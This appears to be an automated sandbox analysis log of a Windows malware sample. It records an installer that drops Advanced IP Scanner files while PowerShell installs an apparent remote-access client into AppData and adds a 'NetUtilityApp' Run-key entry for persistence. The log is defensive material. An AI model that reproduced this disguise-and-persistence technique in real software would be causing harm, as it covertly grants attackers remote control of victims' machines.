Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-BQO9P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-VKO3B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-LNG1F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-INF7O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-UFHDJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-N0NN5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-UNKVD.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	File created: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-P5532.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-806EH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7BDCE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-GFAIP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RIP10.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-133UG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-MH6KB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-HN5GF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-Q7LP1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-6P215.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-FPRGF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-9LCE6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8A8B0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-6E54C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-D0K3T.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-C54PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-PK80C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-DS1TD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-QFJMG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-0TGAP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-R0Q1K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-KE7IL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IO07H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-L306R.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-8I1NP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-PCUQ8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-2U0U8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-2K0TF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-95T15.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C77030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,		6_2_68C77030
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C650E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,		6_2_68C650E0

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_110251B0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_111575D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_111575D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11025600
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1110F600 IsIconic,GetTickCount,	6_2_1110F600
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_111579D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_1111F870
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_1111F870
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_110238D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110BFDD0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11023FB0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_11110220
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	8_2_110251B0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	8_2_111575D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	8_2_111575D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,	8_2_11025600
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1110F600 IsIconic,GetTickCount,	8_2_1110F600
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	8_2_111579D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	8_2_1111F870
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1111F870 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	8_2_1111F870
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	8_2_110238D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	8_2_110BFDD0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	8_2_11023FB0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	8_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	8_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	8_2_11110220

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

6_2_11029230

Source: C:\Users\user\Desktop\KC0uZWwr8p.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
